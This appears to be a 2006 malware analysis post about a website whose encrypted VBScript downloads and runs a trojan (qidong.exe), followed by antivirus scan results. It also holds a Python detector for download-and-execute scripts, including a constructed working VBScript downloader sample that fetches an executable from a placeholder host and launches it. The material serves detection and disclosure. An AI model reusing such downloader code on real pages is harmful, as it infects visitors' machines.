Endurer Original
2006-09-06 2nd version
2006-09-02 1st version
The homepage of hxxp://www.94l****m.com opens, depending on the value of a cookie, one of the following two pages:
/------------
hxxp://www.dudu**{com/web/dudu?###13.htm
------------/
or
/------------
hxxp://www.dud**uw.com/web/dudu??#=12.htm
------------/
Both dudu*****13.htm and dudu*****12.htm contain encrypted VBScript. Once decoded, the script uses XMLHTTP to download hxxp://qidong.virussky.com/qidong.exe, writes it with Scripting.FileSystemObject into the IE temporary folder as an85.com (the .com extension is cosmetic; Windows loads the file as an ordinary PE executable), and launches it through the ShellExecute method of a Shell.Application object.
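As an added illustration (not code from the original post), the Python heuristic below scans an HTML/VBScript page for the three-stage chain described above: an XMLHTTP fetch, a write to disk via Scripting.FileSystemObject or ADODB.Stream, and execution via Shell.Application.ShellExecute or WScript.Shell.Run. It first undoes the cheap string splitting (Chr() calls and & concatenation) that such pages use to hide ProgIDs, then reports which stages are present and any plain-text URLs. The two sample pages, the placeholder host qidong.example.invalid and the function names are constructed for this example. The de-obfuscation does not decode Microsoft Script Encoder output (the #@~^ ... ^#~@ format); an encoded script must be decoded before it is fed in.

```python
import re

# Stages of the download-and-execute chain and the COM ProgIDs / methods
# that implement each one. Matched case-insensitively on de-obfuscated text.
INDICATORS = {
    "fetch":   [r"microsoft\.xmlhttp", r"msxml2\.(server)?xmlhttp"],
    "write":   [r"scripting\.filesystemobject", r"adodb\.stream"],
    "execute": [r"shell\.application", r"\.shellexecute\b",
                r"wscript\.shell", r"\.run\b"],
}

URL_RE = re.compile(r"https?://[^\s\"'<>]+")
CHR_RE = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"\s*&\s*_?\s*"')   # "abc" & "def"  ->  "abcdef" (handles & _ line continuation)


def deobfuscate(script: str) -> str:
    """Turn Chr(n) calls into string literals and join literals concatenated
    with &, so a ProgID split as "Sh" & Chr(101) & "ll.Application" becomes
    "Shell.Application". Does not decode Script Encoder output."""
    def chr_to_literal(m):
        n = int(m.group(1))
        if n > 0xFFFF:                      # not a valid character code; leave untouched
            return m.group(0)
        ch = chr(n)
        return '"' + ('""' if ch == '"' else ch) + '"'   # VBScript doubles embedded quotes

    text = CHR_RE.sub(chr_to_literal, script)
    while True:
        joined = CONCAT_RE.sub("", text)
        if joined == text:
            return text
        text = joined


def classify(script: str) -> dict:
    """Report which stages are present, whether all three are (the downloader
    signature), and the plain-text URLs the script references."""
    text = deobfuscate(script).lower()
    stages = {stage: [p for p in pats if re.search(p, text)]
              for stage, pats in INDICATORS.items()}
    return {
        "downloader": all(stages.values()),
        "stages": stages,
        "urls": URL_RE.findall(text),
    }


# Constructed sample modelled on the behaviour described in the post. It is
# not the original dudu*.htm script; the host is a placeholder.
SAMPLE_DOWNLOADER = r'''<script language="VBScript">
Set http = CreateObject("Micr" & "osoft.XMLHTTP")
http.Open "GET", "http://qidong.example.invalid/qidong.exe", False
http.Send
Set fso = CreateObject("Scripting.FileSystemObject")
path = fso.GetSpecialFolder(2) & "\an85.com"
Set st = CreateObject("ADODB.Stream")
st.Type = 1 : st.Open : st.Write http.responseBody
st.SaveToFile path, 2 : st.Close
Set sh = CreateObject("Sh" & Chr(101) & "ll.Application")
sh.ShellExecute path, "", "", "open", 0
</script>'''

# Constructed benign page: XMLHTTP on its own (ordinary AJAX) must not trigger.
SAMPLE_BENIGN = '''<script language="VBScript">
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "/news.xml", False
http.Send
document.getElementById("news").innerHTML = http.responseText
</script>'''

if __name__ == "__main__":
    for name, page in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        r = classify(page)
        present = {k: bool(v) for k, v in r["stages"].items()}
        print(f"{name}: downloader={r['downloader']} stages={present} urls={r['urls']}")
```

Requiring all three stages keeps ordinary AJAX pages (fetch only) and file-manager scripts (write only) out of the alert set; a page that hits fetch and execute but not write is still worth a manual look, which is why the per-stage hits are returned rather than only the verdict.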
File:             qidong.exe
Status:           Infected/malware
MD5:              f932ee7f241695d5ee6527a231795468
Packers detected: UPX

Scanner results
AntiVir              | Found Heuristic/malware (probable variant)
Arcavir              | Found nothing
Avast                | Found nothing
AVG AntiVirus        | Found nothing
BitDefender          | Found Generic.Malware.Be!G.66e35076
ClamAV               | Found nothing
Dr.Web               | Found Trojan.Update
F-Prot AntiVirus     | Found nothing
Fortinet             | Found nothing
Kaspersky Anti-Virus | Found Trojan-Downloader.Win32.Agent.aqr
NOD32                | Found probably unknown NewHeur_PE (probable variant)
Norman Virus Control | Found nothing
UNA                  | Found nothing
VirusBuster          | Found nothing
VBA32                | Found nothing
Antivirus          | Version        | Update (MM.DD.YYYY) | Result
AntiVir            | 7.1.1.11       | 09.06.2006          | TR/Dldr.Agent.aqr.15
Authentium         | 4.93.8         | 09.06.2006          | no virus found
Avast              | 4.7.844.0      | 09.06.2006          | no virus found
AVG                | 386            | 09.06.2006          | Downloader.Agent.fgl
BitDefender        | 7.2            | 09.06.2006          | Generic.Malware.Be!G.66e35076
CAT-QuickHeal      | 8.00           | 09.05.2006          | no virus found
ClamAV             | devel-20060426 | 09.06.2006          | no virus found
DrWeb              | 4.33           | 09.06.2006          | Trojan.Update
eTrust-InoculateIT | 23.72.117      | 09.05.2006          | no virus found
eTrust-Vet         | 30.3.3064      | 09.06.2006          | no virus found
Ewido              | 4.0            | 09.05.2006          | Downloader.Agent.aqr
Fortinet           | 2.77.0.0       | 09.06.2006          | no virus found
F-Prot             | 3.16f          | 09.06.2006          | no virus found
F-Prot4            | 4.2.1.29       | 09.06.2006          | no virus found
Ikarus             | 0.2.65.0       | 09.06.2006          | no virus found
Kaspersky          | 4.0.2.24       | 09.06.2006          | Trojan-Downloader.Win32.Agent.aqr
McAfee             | 4845           | 09.05.2006          | Downloader-AWE
Microsoft          | 1.1560         | 09.06.2006          | no virus found
NOD32v2            | 1.1741         | 09.06.2006          | probably unknown NewHeur_PE virus
Norman             | 5.90.23        | 09.06.2006          | no virus found
Panda              | 9.0.0.4        | 09.05.2006          | Trj/Delf.ABZ
Sophos             | 4.09.0         | 09.06.2006          | no virus found
Symantec           | 8.0            | 09.06.2006          | no virus found
TheHacker          | 5.9.8.205      | 09.06.2006          | Posible_worm322
UNA                | 1.83           | 09.06.2006          | no virus found
VBA32              | 3.11.1         | 09.05.2006          | Trojan-Downloader.Win32.Agent.aqr
VirusBuster        | 4.3.7:9        | 09.06.2006          | no virus found
Additional information
File size: 31744 bytes
MD5:       f932ee7f241695d5ee6527a231795468
SHA1:      6414ec3d64ede47a4eec4cd07166380b223431da
Packers:   UPX, embedded